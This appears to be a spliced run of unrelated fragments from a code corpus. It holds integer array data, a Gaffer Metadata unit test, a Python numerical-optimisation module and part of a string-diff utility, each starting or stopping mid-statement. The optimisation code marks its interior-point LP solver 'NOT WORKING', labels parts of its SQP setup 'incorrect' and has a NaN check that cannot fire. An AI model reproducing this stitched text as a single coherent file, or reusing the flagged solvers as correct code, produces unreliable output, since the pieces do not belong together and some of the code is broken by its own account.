541,
665,
-6,
541,
665,
21,
541,
665,
51,
615,
259,
18,
619,
158,
43,
623,
58,
62,
573,
160,
16,
550,
232,
4,
608,
197,
-7,
608,
197,
-21,
665,
156,
26,
704,
201,
34,
739,
131,
37,
739,
131,
29,
619,
158,
86
],
[
690,
657,
73,
690,
657,
29,
690,
657,
-3,
686,
510,
48,
665,
380,
24,
619,
378,
7,
573,
376,
22,
561,
535,
47,
543,
677,
-6,
543,
677,
21,
543,
677,
51,
632,
268,
18,
645,
158,
43,
657,
59,
62,
591,
164,
16,
563,
238,
4,
609,
168,
-7,
609,
168,
-21,
698,
152,
26,
750,
194,
34,
821,
136,
37,
821,
136,
29,
645,
158,
86
],
[
| |
<gh_stars>0
##########################################################################
#
# Copyright (c) 2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of <NAME> nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import unittest
import IECore
import Gaffer
import GafferTest
class MetadataTest( GafferTest.TestCase ) :
class DerivedAddNode( GafferTest.AddNode ) :
def __init__( self, name="DerivedAddNode" ) :
GafferTest.AddNode.__init__( self, name )
IECore.registerRunTimeTyped( DerivedAddNode )
def testNodeDescription( self ) :
add = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.nodeDescription( add ), "" )
Gaffer.Metadata.registerNodeDescription( GafferTest.AddNode, "description" )
self.assertEqual( Gaffer.Metadata.nodeDescription( add ), "description" )
Gaffer.Metadata.registerNodeDescription( GafferTest.AddNode, lambda node : node.getName() )
self.assertEqual( Gaffer.Metadata.nodeDescription( add ), "AddNode" )
derivedAdd = self.DerivedAddNode()
self.assertEqual( Gaffer.Metadata.nodeDescription( derivedAdd ), "DerivedAddNode" )
self.assertEqual( Gaffer.Metadata.nodeDescription( derivedAdd, inherit=False ), "" )
Gaffer.Metadata.registerNodeDescription( self.DerivedAddNode.staticTypeId(), "a not very helpful description" )
self.assertEqual( Gaffer.Metadata.nodeDescription( derivedAdd ), "a not very helpful description" )
self.assertEqual( Gaffer.Metadata.nodeDescription( add ), "AddNode" )
def testExtendedNodeDescription( self ) :
multiply = GafferTest.MultiplyNode()
self.assertEqual( Gaffer.Metadata.nodeDescription( multiply ), "" )
Gaffer.Metadata.registerNodeDescription(
GafferTest.MultiplyNode,
"description",
"op1",
"op1 description",
"op2",
{
"description" : "op2 description",
"otherValue" : 100,
}
)
self.assertEqual( Gaffer.Metadata.nodeDescription( multiply ), "description" )
self.assertEqual( Gaffer.Metadata.plugDescription( multiply["op1"] ), "op1 description" )
self.assertEqual( Gaffer.Metadata.plugDescription( multiply["op2"] ), "op2 description" )
self.assertEqual( Gaffer.Metadata.plugValue( multiply["op2"], "otherValue" ), 100 )
def testPlugDescription( self ) :
add = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.plugDescription( add["op1"] ), "" )
Gaffer.Metadata.registerPlugDescription( GafferTest.AddNode.staticTypeId(), "op1", "The first operand" )
self.assertEqual( Gaffer.Metadata.plugDescription( add["op1"] ), "The first operand" )
Gaffer.Metadata.registerPlugDescription( GafferTest.AddNode.staticTypeId(), "op1", lambda plug : plug.getName() + " description" )
self.assertEqual( Gaffer.Metadata.plugDescription( add["op1"] ), "op1 description" )
derivedAdd = self.DerivedAddNode()
self.assertEqual( Gaffer.Metadata.plugDescription( derivedAdd["op1"] ), "op1 description" )
self.assertEqual( Gaffer.Metadata.plugDescription( derivedAdd["op1"], inherit=False ), "" )
Gaffer.Metadata.registerPlugDescription( self.DerivedAddNode, "op*", "derived class description" )
self.assertEqual( Gaffer.Metadata.plugDescription( derivedAdd["op1"] ), "derived class description" )
self.assertEqual( Gaffer.Metadata.plugDescription( derivedAdd["op2"] ), "derived class description" )
self.assertEqual( Gaffer.Metadata.plugDescription( add["op1"] ), "op1 description" )
self.assertEqual( Gaffer.Metadata.plugDescription( add["op2"] ), "" )
def testArbitraryValues( self ) :
add = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.nodeValue( add, "aKey" ), None )
self.assertEqual( Gaffer.Metadata.plugValue( add["op1"], "aKey" ), None )
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "aKey", "something" )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op*", "aKey", "somethingElse" )
self.assertEqual( Gaffer.Metadata.nodeValue( add, "aKey" ), "something" )
self.assertEqual( Gaffer.Metadata.plugValue( add["op1"], "aKey" ), "somethingElse" )
def testInheritance( self ) :
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "iKey", "Base class value" )
derivedAdd = self.DerivedAddNode()
self.assertEqual( Gaffer.Metadata.nodeValue( derivedAdd, "iKey" ), "Base class value" )
self.assertEqual( Gaffer.Metadata.nodeValue( derivedAdd, "iKey", inherit=False ), None )
Gaffer.Metadata.registerNodeValue( self.DerivedAddNode, "iKey", "Derived class value" )
self.assertEqual( Gaffer.Metadata.nodeValue( derivedAdd, "iKey", inherit=False ), "Derived class value" )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op1", "iKey", "Base class plug value" )
self.assertEqual( Gaffer.Metadata.plugValue( derivedAdd["op1"], "iKey" ), "Base class plug value" )
self.assertEqual( Gaffer.Metadata.plugValue( derivedAdd["op1"], "iKey", inherit=False ), None )
Gaffer.Metadata.registerPlugValue( self.DerivedAddNode, "op1", "iKey", "Derived class plug value" )
self.assertEqual( Gaffer.Metadata.plugValue( derivedAdd["op1"], "iKey", inherit=False ), "Derived class plug value" )
def testNodeSignals( self ) :
ns = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal() )
ps = GafferTest.CapturingSlot( Gaffer.Metadata.plugValueChangedSignal() )
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "k", "something" )
self.assertEqual( len( ps ), 0 )
self.assertEqual( len( ns ), 1 )
self.assertEqual( ns[0], ( GafferTest.AddNode.staticTypeId(), "k" ) )
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "k", "somethingElse" )
self.assertEqual( len( ps ), 0 )
self.assertEqual( len( ns ), 2 )
self.assertEqual( ns[1], ( GafferTest.AddNode.staticTypeId(), "k" ) )
def testPlugSignals( self ) :
ns = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal() )
ps = GafferTest.CapturingSlot( Gaffer.Metadata.plugValueChangedSignal() )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op1", "k", "something" )
self.assertEqual( len( ps ), 1 )
self.assertEqual( len( ns ), 0 )
self.assertEqual( ps[0], ( GafferTest.AddNode.staticTypeId(), "op1", "k" ) )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op1", "k", "somethingElse" )
self.assertEqual( len( ps ), 2 )
self.assertEqual( len( ns ), 0 )
self.assertEqual( ps[1], ( GafferTest.AddNode.staticTypeId(), "op1", "k" ) )
def testSignalsDontExposeInternedStrings( self ) :
cs = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal() )
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode, "k", "aaa" )
self.assertTrue( type( cs[0][1] ) is str )
cs = GafferTest.CapturingSlot( Gaffer.Metadata.plugValueChangedSignal() )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode, "op1", "k", "bbb" )
self.assertTrue( type( cs[0][1] ) is str )
self.assertTrue( type( cs[0][2] ) is str )
def testInstanceMetadata( self ) :
Gaffer.Metadata.registerNodeValue( GafferTest.AddNode.staticTypeId(), "imt", "globalNodeValue" )
Gaffer.Metadata.registerPlugValue( GafferTest.AddNode.staticTypeId(), "op1", "imt", "globalPlugValue" )
n = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.nodeValue( n, "imt" ), "globalNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( n["op1"], "imt" ), "globalPlugValue" )
Gaffer.Metadata.registerNodeValue( n, "imt", "instanceNodeValue" )
Gaffer.Metadata.registerPlugValue( n["op1"], "imt", "instancePlugValue" )
self.assertEqual( Gaffer.Metadata.nodeValue( n, "imt" ), "instanceNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( n["op1"], "imt" ), "instancePlugValue" )
Gaffer.Metadata.registerNodeValue( n, "imt", None )
Gaffer.Metadata.registerPlugValue( n["op1"], "imt", None )
self.assertEqual( Gaffer.Metadata.nodeValue( n, "imt" ), "globalNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( n["op1"], "imt" ), "globalPlugValue" )
def testInstanceMetadataUndo( self ) :
s = Gaffer.ScriptNode()
s["n"] = GafferTest.AddNode()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), None )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), None )
with Gaffer.UndoContext( s ) :
Gaffer.Metadata.registerNodeValue( s["n"], "undoTest", "instanceNodeValue" )
Gaffer.Metadata.registerPlugValue( s["n"]["op1"], "undoTest", "instancePlugValue" )
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue" )
with Gaffer.UndoContext( s ) :
Gaffer.Metadata.registerNodeValue( s["n"], "undoTest", "instanceNodeValue2" )
Gaffer.Metadata.registerPlugValue( s["n"]["op1"], "undoTest", "instancePlugValue2" )
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue2" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue2" )
s.undo()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue" )
s.undo()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), None )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), None )
s.redo()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue" )
s.redo()
self.assertEqual( Gaffer.Metadata.nodeValue( s["n"], "undoTest" ), "instanceNodeValue2" )
self.assertEqual( Gaffer.Metadata.plugValue( s["n"]["op1"], "undoTest" ), "instancePlugValue2" )
def testInstanceMetadataSignals( self ) :
n = GafferTest.AddNode()
ncs = GafferTest.CapturingSlot( Gaffer.Metadata.nodeValueChangedSignal() )
pcs = GafferTest.CapturingSlot( Gaffer.Metadata.plugValueChangedSignal() )
Gaffer.Metadata.registerNodeValue( n, "signalTest", 1 )
Gaffer.Metadata.registerPlugValue( n["op1"], "signalTest", 1 )
self.assertEqual( len( ncs ), 1 )
self.assertEqual( len( pcs ), 1 )
self.assertEqual( ncs[0], ( GafferTest.AddNode.staticTypeId(), "signalTest" ) )
self.assertEqual( pcs[0], ( GafferTest.AddNode.staticTypeId(), "op1", "signalTest" ) )
Gaffer.Metadata.registerNodeValue( n, "signalTest", 1 )
Gaffer.Metadata.registerPlugValue( n["op1"], "signalTest", 1 )
self.assertEqual( len( ncs ), 1 )
self.assertEqual( len( pcs ), 1 )
Gaffer.Metadata.registerNodeValue( n, "signalTest", 2 )
Gaffer.Metadata.registerPlugValue( n["op1"], "signalTest", 2 )
self.assertEqual( len( ncs ), 2 )
self.assertEqual( len( pcs ), 2 )
self.assertEqual( ncs[1], ( GafferTest.AddNode.staticTypeId(), "signalTest" ) )
self.assertEqual( pcs[1], ( GafferTest.AddNode.staticTypeId(), "op1", "signalTest" ) )
def testSerialisation( self ) :
s = Gaffer.ScriptNode()
s["n"] = GafferTest.AddNode()
Gaffer.Metadata.registerNodeValue( s["n"], "serialisationTest", 1 )
Gaffer.Metadata.registerPlugValue( s["n"]["op1"], "serialisationTest", 2 )
s2 = Gaffer.ScriptNode()
s2.execute( s.serialise() )
self.assertEqual( Gaffer.Metadata.nodeValue( s2["n"], "serialisationTest" ), 1 )
self.assertEqual( Gaffer.Metadata.plugValue( s2["n"]["op1"], "serialisationTest" ), 2 )
def testStringSerialisationWithNewlinesAndQuotes( self ) :
trickyStrings = [
"Paragraph 1\n\nParagraph 2",
"'Quote'",
"Apostrophe's",
'"Double quote"',
]
script = Gaffer.ScriptNode()
script["n"] = Gaffer.Node()
for s in trickyStrings :
p = Gaffer.IntPlug( flags = Gaffer.Plug.Flags.Default | Gaffer.Plug.Flags.Dynamic )
script["n"]["user"].addChild( p )
Gaffer.Metadata.registerPlugValue( p, "description", s )
script2 = Gaffer.ScriptNode()
script2.execute( script.serialise() )
for p, s in zip( script2["n"]["user"].children(), trickyStrings ) :
self.assertEqual( Gaffer.Metadata.plugDescription( p ), s )
def testRegisteredValues( self ) :
n = GafferTest.AddNode()
self.assertTrue( "r" not in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rp" not in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
self.assertTrue( "ri" not in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rpi" not in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
Gaffer.Metadata.registerNodeValue( n.staticTypeId(), "r", 10 )
Gaffer.Metadata.registerPlugValue( n.staticTypeId(), "op1", "rp", 20 )
self.assertTrue( "r" in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rp" in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
self.assertTrue( "ri" not in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rpi" not in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
Gaffer.Metadata.registerNodeValue( n, "ri", 10 )
Gaffer.Metadata.registerPlugValue( n["op1"], "rpi", 20 )
self.assertTrue( "r" in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rp" in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
self.assertTrue( "ri" in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rpi" in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
self.assertTrue( "r" not in Gaffer.Metadata.registeredNodeValues( n, instanceOnly=True ) )
self.assertTrue( "rp" not in Gaffer.Metadata.registeredPlugValues( n["op1"], instanceOnly=True ) )
self.assertTrue( "ri" in Gaffer.Metadata.registeredNodeValues( n ) )
self.assertTrue( "rpi" in Gaffer.Metadata.registeredPlugValues( n["op1"] ) )
def testInstanceDestruction( self ) :
for i in range( 0, 1000 ) :
p = Gaffer.Plug()
n = Gaffer.Node()
self.assertEqual( Gaffer.Metadata.plugValue( p, "destructionTest" ), None )
self.assertEqual( Gaffer.Metadata.nodeValue( n, "destructionTest" ), None )
Gaffer.Metadata.registerPlugValue( p, "destructionTest", 10 )
Gaffer.Metadata.registerNodeValue( n, "destructionTest", 20 )
self.assertEqual( Gaffer.Metadata.plugValue( p, "destructionTest" ), 10 )
self.assertEqual( Gaffer.Metadata.nodeValue( n, "destructionTest" ), 20 )
del p
del n
def testOrder( self ) :
class MetadataTestNodeA( Gaffer.Node ) :
def __init__( self, name = "MetadataTestNodeOne" ) :
Gaffer.Node.__init__( self, name )
self["a"] = Gaffer.IntPlug()
IECore.registerRunTimeTyped( MetadataTestNodeA )
class MetadataTestNodeB( MetadataTestNodeA ) :
def __init__( self, name = "MetadataTestNodeOne" ) :
MetadataTestNodeA.__init__( self, name | |
import copy
import numpy as np
import numpy.linalg as la
from scipy.optimize import linprog # TODO: REMOVE
from _errors import ConvergenceError
# ======================================================================================================================
# Root-finding Methods
# ======================================================================================================================
def secant(fun, x0, x1, args=()):
# options ----------------------------------------------------------------------------------------------------------
max_it = 1000
tol = 1e-3
# initializing loop ------------------------------------------------------------------------------------------------
it = 0
root = x1
# iterating --------------------------------------------------------------------------------------------------------
while abs(x1 - x0) > tol and it < max_it:
f0 = fun(x0, *args)
f1 = fun(x1, *args)
root -= f1 * (root - x0) / (f1 - f0)
if root in (np.inf, np.nan):
raise ConvergenceError('division by zero')
x0 = x1
x1 = root
it += 1
return root
# ======================================================================================================================
# Least Squares Methods
# ======================================================================================================================
def residual(f, x, y, p, args=()):
return y - f(x, *p, *args)
def lsq_obj(r):
return 0.5 * la.norm(r) ** 2.
def d_lsq_obj(r, j):
return j.T @ r
def jacobian_fd(x, p, f, args=()):
m = len(p)
j = [None for _ in range(0, m)]
eps = 1e-8
fx = f(x, *p, *args)
for i in range(0, m):
p_ = copy.deepcopy(list(p))
p_[i] += eps
j[i] = (f(x, *p_, *args) - fx) / eps
return np.asarray(j).T
def nl_lsq(fun, x, y, p0, jac=None, args=()):
# options ----------------------------------------------------------------------------------------------------------
max_it = 1000
max_it_bt = 100
tol = 1e-3
rho = 0.5
c = 1e-4
if jac is None:
jac = lambda xj, *pj: jacobian_fd(xj, pj, fun, args=args)
# initializing loop ------------------------------------------------------------------------------------------------
it = 0
converged = False
p = p0
res = residual(fun, x, y, p, args=args)
j = jac(x, *p, *args)
f = lsq_obj(res)
df = d_lsq_obj(res, j)
# iterating --------------------------------------------------------------------------------------------------------
while not converged and it < max_it:
# calculate optimized step
try:
q, r = la.qr(j)
dp = la.solve(r, q.T @ res)
except np.linalg.LinAlgError:
raise ConvergenceError('Unable to find a solution due to singular matrix issues')
# invoke backtracking
alpha = 1.
it_bt = 0
p_bt = p + dp
f_bt = lsq_obj(residual(fun, x, y, p_bt, args=args))
csdf = -c * np.dot(dp, df)
while f_bt >= (f + alpha * csdf) and it_bt < max_it_bt:
p_bt = p + alpha * dp
f_bt = lsq_obj(residual(fun, x, y, p_bt, args=args))
alpha *= rho
it_bt += 1
p = p_bt
# update parameters and check convergence
res = residual(fun, x, y, p, args=args)
f = lsq_obj(res)
j = jac(x, *p_bt, *args)
df = d_lsq_obj(res, j)
if la.norm(df, np.inf) < tol:
converged = True
it += 1
if it == max_it:
raise ConvergenceError('Solver failed to converge within maximum number of iterations')
return p
# ======================================================================================================================
# Linear Programming Methods
# ======================================================================================================================
def lin_ip(A, g, b):
"""
TODO: NOT WORKING
# Algorithm 14.3, Page 411 Nocedal & Wright
Parameters
----------
A : array_like
system matrix of the constraints
g : array_like
objective function multiplier
b : array_like
right-hand side of the constrains
Returns
-------
array_like
optimal solution vector
"""
converged = False
m, n = A.shape
max_iter = 10
iter_ = 0
eta = 0.99
# initial value correction heuristic -------------------------------------------------------------------------------
AA = A @ A.T
x_t = A.T @ la.solve(AA, b)
l_t = la.solve(AA, A @ g)
s_t = g - A.T @ l_t
dx = max(-1.5 * x_t.min(), 0.)
ds = max(-1.5 * s_t.min(), 0.)
x_h = x_t + dx
s_h = s_t + ds
xhsh = x_h.T @ s_h
dx_h = .5 * xhsh / (np.sum(s_h))
ds_h = .5 * xhsh / (np.sum(x_h))
x = x_h + dx_h
l = l_t
s = s_h + ds_h
# main loop --------------------------------------------------------------------------------------------------------
r_c = A.T @ l + s - g
r_b = A @ x - b
mu = (x.T @ s) / n
while (not converged) and (iter_ < max_iter):
iter_ = iter_ + 1
# KKT system
kkt = np.block([[np.zeros((n, n)), A.T, np.eye(n)],
[A, np.zeros((m, m)), np.zeros((m, n))],
[np.diag(s.flatten()), np.zeros((n, m)), np.diag(x.flatten())]])
rhs = np.vstack((-r_c, -r_b, -x * s))
# Solving for and extracting affine variables
# QR decompose KKT matrix, TODO: LDL decomposition instead
q, r = la.qr(kkt)
dv_aff = q @ la.solve(r.T, rhs)
dx_aff = dv_aff[:n]
ds_aff = dv_aff[(n + m):]
# Determining indices and corresponding alpha for affine variables
alpha_prim_aff = np.where(dx_aff < 0., -x / dx_aff, 1.).min()
alpha_dual_aff = np.where(ds_aff < 0., -s / ds_aff, 1.).min()
# Calculating affine mu, mu and sigma
mu_aff = ((x + alpha_prim_aff * dx_aff).T @ (s + alpha_dual_aff * ds_aff)) / n
sigma = (mu_aff / mu) ** 3. if mu > 1.e-10 else 0.
rhs = np.vstack((-r_c, -r_b, -x * s - dx_aff * ds_aff + sigma * mu))
# Solving for and extracting increments
dv = q @ la.solve(r.T, rhs)
dx = dv[:n]
dl = dv[n:(n + m)]
ds = dv[(n + m):]
# Determining indices and corresponding alpha for x and s
alpha_prim = np.where(dx < 0., eta * (-x / dx), 1.).min()
alpha_dual = np.where(ds < 0., eta * (-s / ds), 1.).min()
# updating x, l and s
x += alpha_prim * dx
l += alpha_dual * dl
s += alpha_dual * ds
print('X')
print(x)
# convergence check
r_c = A.T @ l + s - g
r_b = A @ x - b
mu = (x.T @ s) / n
converged = (la.norm(r_c, ord=np.inf) <= 1.e-9) and (la.norm(r_b, ord=np.inf) <= 1.e-9) and (abs(mu) <= 1.e-9)
print('CONVERGENCE')
print('rC', la.norm(r_c, ord=np.inf))
print('rA', la.norm(r_b, ord=np.inf))
print('mu', abs(mu))
return x
# ======================================================================================================================
# Quadratic Programming Methods
# ======================================================================================================================
def nl_sqp(obj, con, x0, H0):
"""
Non-linear SQP solver for inequality constrained problems
TODO: Implement equality constraints
:param obj:
:param con:
:param x0:
:param H0:
:return:
"""
# Options ----------------------------------------------------------------------------------------------------------
tol = 1.0e-3
max_iter = 300
n = x0.shape[0]
# calculating objective function and constraint function using a numerical approximation for Jacobians
xeval = x0
f, df = obj(xeval)
c, dc = con(xeval)
m = c.size
mu = 100.
# assembling KKT system
A = np.zeros((n + m, 0)) # incorrect, assemble for equality constraints
b = np.zeros(0) # incorrect, assemble for equality constraints
H = np.block([[np.zeros(H0.shape), np.zeros((H0.shape[0], m))], [np.zeros((m, H0.shape[1])), np.eye(m) * 1e-6]])
g = np.block([np.zeros((df.shape[0], 1)), np.zeros((m, 1))])
y = np.zeros(0)
C = np.block([[np.zeros(dc.shape), np.zeros((m, m))], [np.zeros((m, n)), np.eye(m)]])
d = np.zeros(2 * m)
B = H0
z = np.abs(la.solve(dc, df))
s = np.ones(2 * m)
dLold = df - dc @ z
# Main loop iterations ---------------------------------------------------------------------------------------------
converged = (la.norm(dLold, ord=np.inf) < tol) and (la.norm(z * c, ord=np.inf) < tol) # z * c element wise
rho = 0.5
iter = 0
while (not converged) and (iter < max_iter):
# Updating initial guess input for the PDPCIP algorithm
H[:n, :n] = B
g = np.block([df, mu * np.ones(m)])
# TODO: Missing the equality constrains here?
C[:m, :m] = dc
d[:m] = -c
zpad = np.block([z, np.ones(m)])
t = np.maximum(-(c + dc @ xeval), np.zeros(m))
xt = np.block([xeval, t])
# Sub problem: Solve constrained QP
p, y, z, _ = quad_ip(H, g, A, b, C, d, xt, y, s, zpad)
xeval = xt[:n]
z = z[:n]
p = p[:n]
# Take step
xeval += p
# Function evaluation
f, df = obj(xeval)
c, dc = con(xeval)
mu = (df.T @ p + 0.5 * p.T @ B @ p) / ((1. - rho) * la.norm(c, ord=1))
# Lagrangian gradient, z used for inequality constraints
dLnew = df - dc @ z
# BFGS Hessian update
q = dLnew - dLold
Bp = B @ p
if np.dot(p, q) >= 0.2 * np.dot(p, Bp):
theta = 1.
else:
theta = (0.8 * np.dot(p, Bp)) / (np.dot(p, Bp) - np.dot(p, q))
r = theta * q + (1. - theta) * Bp
r = r.reshape((r.shape[0], 1))
Bp = Bp.reshape((Bp.shape[0], 1))
B += r @ r.T / np.dot(p, r) - Bp @ Bp.T / np.dot(p, Bp)
dLold = dLnew
iter += 1
converged = (la.norm(dLold, np.inf) < tol) and (la.norm(z * c, np.inf) < tol) # z * c piecewise
info = converged
zopt = z[:2]
xopt = xeval
return xopt, zopt, info
def quad_ip(H, g, A, b, C, | |
(start position, length)
"""
buf = []
for i, elt in enumerate(mask):
if elt:
buf.append(i)
elif buf:
yield buf[0], len(buf)
buf = []
if buf:
yield buf[0], len(buf)
def greedy_matching(seq1, seq2, min_match_size):
"""
Greedy search for common substrings between seq1 and seq2.
Residual substrings (smaller than min_match_size) are also output as deletions (from seq1)
or insertions (into seq2).
Returns an iterator over triples: (position in seq1, position in seq2, substring)
The position in seq1 is -1 for insertions, and the position in seq2 is -1 for deletions.
"""
assert min_match_size > 0
retained_matches = []
# Indicate for each character if it is already covered by a match
mask1 = [1] * len(seq1)
mask2 = [1] * len(seq2)
# List *all* common substrings and sort them (mainly) by length.
# This is fine since we do (should) not deal with huge strings.
match_it = chain(word_based_matches(seq1, seq2, min_match_size),
char_based_matches(seq1, seq2, min_match_size))
dedup = {match[0]: match for match in match_it}
match_list = sorted(dedup.values(), key=order_key)
# Consume all common substrings, longest first
while match_list:
substr, pos1, pos2 = match_list[0]
i, j = pos1[0], pos2[0]
retained_matches.append((i, j, substr))
size = len(substr)
# Update masks with newly retained characters
mask1[i:i+size] = [0] * size
mask2[j:j+size] = [0] * size
# Eliminate common substrings for which at least one char is already covered
match_list = list(clean_match_list(match_list, mask1, mask2))
# Output matches
for match in retained_matches:
yield match
# Output deletions
for pos, size in residual_diff(mask1):
yield pos, -1, seq1[pos:pos + size]
# Output insertions
for pos, size in residual_diff(mask2):
yield -1, pos, seq2[pos:pos + size]
def find_regular_matches(ops):
"""
Find the set of regular (non-shift) matches from the list of operations.
"ops" is the list of triples as returned by greedy_matching().
"""
matches1 = sorted(m for m in ops if m[0] != -1 and m[1] != -1)
matches2 = sorted(matches1, key=lambda match: match[1])
# Search for the longest common subsequence in characters
# Expand "string" matches into "character" matches
char_matches1 = [(m, i) for m in matches1 for i in range(len(m[2]))]
char_matches2 = [(m, i) for m in matches2 for i in range(len(m[2]))]
sm = difflib.SequenceMatcher(None, char_matches1, char_matches2, autojunk=False)
return {m for a, _, size in sm.get_matching_blocks()
for m, _ in char_matches1[a:a + size]}
def eval_shift_distance(shift, reg_matches):
"""
Compute the distance in characters a match has been shifted over.
"reg_matches" is the set of regular matches as returned by find_regular_matches().
The distance is defined as the number of characters between the shifted match
and the closest regular match.
"""
mid_matches = sorted(m for m in reg_matches
if (m[0] < shift[0] and m[1] > shift[1])
or (m[0] > shift[0] and m[1] < shift[1]))
return (-(shift[0] - mid_matches[0][0])
if mid_matches[0][0] < shift[0]
else (mid_matches[-1][0] + len(mid_matches[-1][2])
- (shift[0] + len(shift[2]))))
def add_shift_distance(ops, reg_matches):
"""
Decorate the list of operations with the shift distance.
The distance is 0 for everything but shifts.
Returns an iterator over 4-tuples:
(pos in seq1, pos in seq2, substring, integer distance)
"""
# Experimental: turn shifts back into insertions/deletions
# if the shift distance is "too large".
for op in ops:
alo, blo, slice = op
if alo == -1 or blo == -1 or op in reg_matches:
yield op + (0,)
else: # shift
dist = eval_shift_distance(op, reg_matches)
# Heuristic: the shorter a string,
# the shorter the distance it is allowed to travel
if math.exp(len(slice)) >= abs(dist):
yield op + (dist,)
else: # replace shift with deletion + insertion
yield -1, blo, slice, 0
yield alo, -1, slice, 0
def _merge_adjacent_diffs_aux(diffs):
prev_start = 0
prev_substr = u''
for start, substr in diffs:
if start == prev_start + len(prev_substr):
prev_substr += substr
else:
if prev_substr:
yield prev_start, prev_substr
prev_start = start
prev_substr = substr
if prev_substr:
yield prev_start, prev_substr
def merge_adjacent_diffs(ops):
"""Final cleaning: merge adjacent deletions or insertions into a single operation."""
matches = [op for op in ops if op[0] != -1 and op[1] != -1]
deletions = sorted((alo, substr) for alo, blo, substr, _ in ops if blo == -1)
insertions = sorted((blo, substr) for alo, blo, substr, _ in ops if alo == -1)
for op in matches:
yield op
for alo, substr in _merge_adjacent_diffs_aux(deletions):
yield alo, -1, substr, 0
for blo, substr in _merge_adjacent_diffs_aux(insertions):
yield -1, blo, substr, 0
def add_css_classes(ops):
"""
Decorate the list of operations with CSS classes for display.
Each operation is assigned 2 classes:
* {ins,del,shift,match} for the display style
* {diff,shift,match}X serve as ids for mouse-overs (substrings that match
in the two segments compared have the same id)
Returns an iterator over 6-tuples:
(pos in seq1, pos in seq2, substring, distance, css class, css id)
"""
# Substrings are identified based on their start index in the first sequence
match_alo = 0
for op in ops:
alo, blo, _, dist = op
if alo == -1:
yield op + ('ins', 'diff{}'.format(match_alo))
elif blo == -1:
yield op + ('del', 'diff{}'.format(match_alo))
elif dist:
yield op + ('shift', 'shift{}'.format(alo))
else:
yield op + ('match', 'match{}'.format(alo))
match_alo = alo
def compare_segments(cand, ref, min_match_size):
"""
Main segment comparison function.
cand and ref are the original unicode strings.
Return a pair of operation list (same 6-tuples as returned by add_css_classes())
"""
base_ops = list(greedy_matching(cand, ref, min_match_size))
